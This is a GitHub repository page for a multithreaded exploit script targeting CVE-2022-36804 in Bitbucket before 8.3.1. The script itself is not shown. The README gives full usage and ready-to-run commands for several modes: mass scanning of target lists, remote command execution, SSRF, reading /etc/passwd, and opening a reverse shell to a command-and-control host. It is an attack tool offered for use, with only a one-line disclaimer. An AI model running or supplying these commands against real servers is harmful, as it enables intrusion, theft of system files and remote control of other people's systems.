Skip to content

notxesh/CVE-2022-36804-PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

CVE-2022-36804.py

CVE-2022-36804.py

 
 

README.md

README.md

 
 

requirements.txt

requirements.txt

 
 

Repository files navigation

CVE-2022-36804-PoC

Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions <8.3.1 See the full advisory here https://jira.atlassian.com/browse/BSERV-13438

All credit to TheGrandPew for discovery

The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.

The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.

Do not use for malicious purposes.

Usage

usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level

Exploit modes

Check

Single Host

CVE-2022-36804.py http://bitbucket.local:7990/

Multiple Hosts and piping vulnerable hosts and repositories exploited to file

CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts

RCE (Remote Code Execution)

CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/

SSRF (Server-Side Request Forgery)

Perform a DNS request to the specified knary

CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/

Download

Download a repository with the target file /etc/passwd, this will save the compressed repository to a randomised file name.

CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/

Rev_shell (Generates a reverse sh shell to the specified host and port)

CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/

About

Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1

Resources

Readme
Activity

Stars

18 stars

Watchers

1 watching

Forks

10 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages